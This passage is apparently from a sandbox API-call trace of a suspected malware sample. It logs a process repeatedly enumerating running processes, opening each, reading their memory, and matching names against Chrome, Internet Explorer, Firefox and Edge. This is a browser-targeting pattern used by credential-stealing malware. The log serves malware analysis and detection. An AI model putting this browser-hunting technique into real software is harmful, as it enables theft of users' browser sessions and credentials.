	[0228.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.131] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.132] NtQueryInformationProcess (in: ProcessHandle=0x6318, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.132] ReadProcessMemory (in: hProcess=0x6318, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.132] ReadProcessMemory (in: hProcess=0x6318, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.132] ReadProcessMemory (in: hProcess=0x6318, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.132] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.132] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x631c
	[0228.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.133] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.134] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.134] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0228.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.134] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.134] NtQueryInformationProcess (in: ProcessHandle=0x631c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.134] ReadProcessMemory (in: hProcess=0x631c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.134] ReadProcessMemory (in: hProcess=0x631c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.135] ReadProcessMemory (in: hProcess=0x631c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.135] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.135] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6320
	[0228.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.136] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.136] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.137] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.137] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0228.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6324
	[0228.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.138] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0228.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.138] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.139] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0228.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.139] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6328
	[0228.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.140] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.141] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.141] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.141] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.141] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x632c
	[0228.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.143] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.143] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.144] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.144] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6330
	[0228.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.145] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.145] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.146] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.146] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0228.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6334
	[0228.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.147] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0228.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.148] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.148] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0228.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.148] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0228.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6338
	[0228.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.149] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.150] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.150] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.151] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x633c
	[0228.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.152] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.152] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.153] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.153] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0228.154] CloseHandle (hObject=0x4fd0) returned 1
	[0228.154] Sleep (dwMilliseconds=0x64) 
	[0228.261] GetCurrentProcessId () returned 0x110
	[0228.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0228.267] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0228.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0228.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0228.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6340
	[0228.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.273] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.274] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.274] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.274] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6344
	[0228.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.275] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.276] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.276] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.276] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0228.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6348
	[0228.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.278] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0228.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.278] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.278] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0228.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.279] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x634c
	[0228.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.280] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.280] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.281] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.281] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0228.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6350
	[0228.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.282] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0228.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.282] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.283] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0228.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.283] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0228.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6354
	[0228.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.284] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0228.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.285] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.285] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0228.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.286] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.286] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0228.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6358
	[0228.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.287] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0228.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.287] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.287] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0228.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.288] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0228.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x635c
	[0228.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.289] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.289] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.289] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.290] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.290] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6360
	[0228.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6364
	[0228.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.294] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.294] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.294] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.295] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6368
	[0228.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.296] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.296] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.297] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.297] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x636c
	[0228.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.298] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.298] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.299] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.299] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6370
	[0228.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
